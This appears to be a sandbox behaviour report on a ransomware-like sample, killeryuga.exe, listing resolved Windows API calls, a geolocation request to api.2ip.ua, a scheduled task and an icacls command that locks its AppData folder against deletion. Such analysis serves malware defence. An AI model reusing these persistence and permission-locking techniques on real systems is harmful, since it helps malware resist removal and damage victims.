Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 2
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 3
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 2
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x74d4cc89 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x75af1ace True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x75b14124 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x75b1232e True 1
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x75b1555d True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x75af138a True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x75ae7590 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x75b1439f True 1
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x7560503c True 1
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x755feba1 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75f5d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x75f21ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x75f01635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x75eff48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x74b53058 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x74b52f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x74b52dd6 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74b126e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x74f57136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74af9263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x74a9436b True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x74aa572c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749ec544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
System (257)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-03-24 16:36:12 (UTC) True 1
Fn
Get Time type = Ticks, time = 95488 True 1
Fn
Get Time type = Performance Ctr, time = 14672507109 True 1
Fn
Get Time type = System Time, time = 2019-03-24 16:36:15 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 15394848052 True 1
Fn
Get Time type = System Time, time = 2019-03-24 16:36:29 (UTC) True 1
Fn
Get Info type = Hardware Information True 249
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (1)
Information Value
Total Data Sent 467 bytes
Total Data Received 7.25 KB
Contacted Host Count 1
Contacted Hosts 77.123.139.189
HTTP Session #1
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 554 True 1
Fn
Data
Close Session - True 1
Fn
Process #3: icacls.exe
0 0
Information Value
ID #3
File Name c:\windows\syswow64\icacls.exe
Command Line icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:52, Reason: Child Process
Unmonitor End Time: 00:00:54, Reason: Self Terminated
Monitor Duration 00:00:02
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x98c
Parent PID 0x8e0 (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x990
0x994
Process #4: taskeng.exe
0 0
Information Value
ID #4
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:53, Reason: Created Scheduled Job
Unmonitor End Time: 00:01:18, Reason: Self Terminated
Monitor Duration 00:00:25
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x50c
Parent PID 0x36c (c:\windows\system32\svchost.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x97C
0x578
0x574
0x520
0x514
0x510
Process #5: killeryuga.exe
2147 11
Information Value
ID #5
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Admin IsNotAutoStart IsNotTask
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:53, Reason: Child Process
Unmonitor End Time: 00:01:19, Reason: Self Terminated
Monitor Duration 00:00:25
OS Process Information
Information Value
PID 0x99c
Parent PID 0x8e0 (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x9A0
0x9A8
0x9AC
0x9B0
0x9B4
0x9B8
0x9BC
0x9C0
0x9C4
0x9C8
0x9CC
0x9E0
0x9E4
0x9E8
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
